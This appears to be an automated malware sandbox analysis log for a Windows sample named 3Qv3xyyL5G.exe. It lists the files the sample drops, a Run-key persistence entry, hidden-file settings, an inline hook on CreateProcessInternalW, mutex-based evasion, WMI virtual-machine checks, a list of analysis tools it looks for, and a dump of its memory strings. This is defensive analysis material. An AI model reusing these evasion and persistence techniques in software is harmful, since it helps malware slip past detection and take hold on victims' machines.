                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-core-debug-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-core-file-l2-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-core-heap-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI37682\_hashlib.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI37682\_lzma.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-crt-time-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI37682\select.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-core-processenvironment-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI37682\libcrypto-1_1.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-core-profile-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI37682\_bz2.pydJump to dropped file
                    Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-core-file-l1-2-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-crt-string-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI37682\libffi-7.dllJump to dropped file
                    Source: C:\Users\user\Desktop\3Qv3xyyL5G.exeFile created: C:\Users\user\AppData\Roaming\65D35BAB97073674480464\65D35BAB97073674480464.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-core-console-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-crt-utility-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI37682\ucrtbase.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-core-string-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-core-file-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-core-memory-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
                    Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\3Qv3xyyL5G.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ServicesJump to behavior
                    Source: C:\Users\user\Desktop\3Qv3xyyL5G.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ServicesJump to behavior

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Changes the view of files in windows explorer (hidden files and folders)
                    Source: C:\Windows\System32\audiodg.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced HiddenJump to behavior
                    Modifies the prolog of user mode functions (user mode inline hooks)
                    Source: explorer.exeUser mode code has changed: module: KERNEL32.DLL function: CreateProcessInternalW new code: 0xE9 0x90 0x00 0x07 0x75 0x5D
                    Source: C:\Windows\explorer.exeCode function: 5_2_0B0A5340 LoadLibraryA,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,5_2_0B0A5340
                    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Found evasive API chain (may stop execution after checking mutex)
                    Source: C:\Windows\System32\msiexec.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_10-1462
                    Source: C:\Users\user\Desktop\3Qv3xyyL5G.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_0-1455
                    Source: C:\Windows\System32\msiexec.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_10-1156
                    Source: C:\Windows\System32\svchost.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_2-1143
                    Source: C:\Windows\System32\svchost.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_2-1366
                    Source: C:\Windows\System32\audiodg.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_9-1142
                    Source: C:\Users\user\Desktop\3Qv3xyyL5G.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_0-1195
                    Source: C:\Users\user\AppData\Roaming\65D35BAB97073674480464\65D35BAB97073674480464.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_7-1146
                    Source: C:\Users\user\AppData\Roaming\65D35BAB97073674480464\65D35BAB97073674480464.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_7-1450
                    Source: C:\Windows\System32\audiodg.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_9-1444
                    Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                    Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                    Source: 3Qv3xyyL5G.exe, svchost.exe, 65D35BAB97073674480464.exe, audiodg.exe, msiexec.exeBinary or memory string: PROCMON.EXE
                    Source: 3Qv3xyyL5G.exe, svchost.exe, 65D35BAB97073674480464.exe, audiodg.exe, msiexec.exeBinary or memory string: PROCESSHACKER.EXE
                    Source: 3Qv3xyyL5G.exe, svchost.exe, 65D35BAB97073674480464.exe, audiodg.exe, msiexec.exeBinary or memory string: X64DBG.EXE
                    Source: 3Qv3xyyL5G.exe, svchost.exe, 65D35BAB97073674480464.exe, audiodg.exe, msiexec.exeBinary or memory string: AUTORUNS.EXE
                    Source: 65D35BAB97073674480464.exe.0.drBinary or memory string: GETTHREADIDKERNEL32NTDLLISWOW64PROCESSKERNEL32ZEROX64MADE IN ALGERIA <3REFLECTIVELOADERSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNGQGWZDSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\STARTUPAPPROVED\RUNSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\STARTUPAPPROVED\STARTUPFOLDER.EXELOADLIBRARYAKERNEL32.DLLGETPROCADDRESSKERNEL32.DLLWCSCPYMSVCRT.DLLWCSCATMSVCRT.DLLWCSCMPMSVCRT.DLLWCSNCPYMSVCRT.DLLWCSLENMSVCRT.DLLSTRLENMSVCRT.DLLREALLOCMSVCRT.DLLFREEMSVCRT.DLLWCSSTRMSVCRT.DLLGETWINDOWSDIRECTORYWKERNEL32.DLLGETVOLUMEINFORMATIONWKERNEL32.DLLLSTRCATWKERNEL32.DLLSETFILEATTRIBUTESWKERNEL32.DLLCLOSEHANDLEKERNEL32.DLLGETVERSIONEXAKERNEL32.DLLDELETEFILEWKERNEL32.DLLCREATEDIRECTORYAKERNEL32.DLLGETFILEATTRIBUTESAKERNEL32.DLLGETMODULEFILENAMEAKERNEL32.DLLCOPYFILEAKERNEL32.DLLGETWINDOWSDIRECTORYAKERNEL32.DLLCREATEFILEAKERNEL32.DLLHEAPALLOCKERNEL32.DLLGETPROCESSHEAPKERNEL32.DLLEXPANDENVIRONMENTSTRINGSWKERNEL32.DLLRESUMETHREADKERNEL32.DLLSETTHREADCONTEXTKERNEL32.DLLRTLCOMPAREMEMORYKERNEL32.DLLVIRTUALALLOCEXKERNEL32.DLLGETMODULEHANDLEAKERNEL32.DLLGETTHREADCONTEXTKERNEL32.DLLGETMODULEFILENAMEWKERNEL32.DLLVIRTUALPROTECTEXKERNEL32.DLLGETLASTERRORKERNEL32.DLLRELEASEMUTEXKERNEL32.DLLCREATEMUTEXAKERNEL32.DLLHEAPFREEKERNEL32.DLLWAITFORSINGLEOBJECTKERNEL32.DLLCREATETHREADKERNEL32.DLLCHECKREMOTEDEBUGGERPRESENTKERNEL32.DLLGETCURRENTPROCESSKERNEL32.DLLISDEBUGGERPRESENTKERNEL32.DLLEXITPROCESSKERNEL32.DLLDELETEFILEAKERNEL32.DLLPROCESS32NEXTWKERNEL32.DLLTERMINATEPROCESSKERNEL32.DLLOPENPROCESSKERNEL32.DLLPROCESS32FIRSTWKERNEL32.DLLCREATETOOLHELP32SNAPSHOTKERNEL32.DLLSETENDOFFILEKERNEL32.DLLLSTRCMPAKERNEL32.DLLWRITEPROCESSMEMORYKERNEL32.DLLREADPROCESSMEMORYKERNEL32.DLLGETFILESIZEKERNEL32.DLLWRITEFILEKERNEL32.DLLADJUSTTOKENPRIVILEGESADVAPI32.DLLOPENPROCESSTOKENADVAPI32.DLLLOOKUPPRIVILEGEVALUEWADVAPI32.DLLGETTOKENINFORMATIONADVAPI32.DLLCREATEFILEWKERNEL32.DLLSHGETFOLDERPATHWSHELL32.DLLSHGETFOLDERPATHASHELL32.DLLLSTRCATAKERNEL32.DLLSETFILEATTRIBUTESAKERNEL32.DLLSHGETKNOWNFOLDERPATHSHELL32.DLLFREELIBRARYKERNEL32.DLLMOVEFILEWKERNEL32.DLLGETFILESIZEEXKERNEL32.DLLGETWINDOWSDIRECTORYAKERNEL32.DLLGETVOLUMEINFORMATIONAKERNEL32.DLLGETTICKCOUNTKERNEL32.DLLWSPRINTFWUSER32.DLLWSPRINTFAUSER32.DLLVIRTUALALLOCKERNEL32.DLLREADFILEKERNEL32.DLLSLEEPKERNEL32.DLLVIRTUALFREEKERNEL32.DLLSETFILEPOINTERKERNEL32.DLLCREATEDIRECTORYWKERNEL32.DLLFINDFIRSTFILEWKERNEL32.DLLFINDNEXTFILEWKERNEL32.DLLFINDCLOSEKERNEL32.DLLCOPYFILEWKERNEL32.DLLWRITEF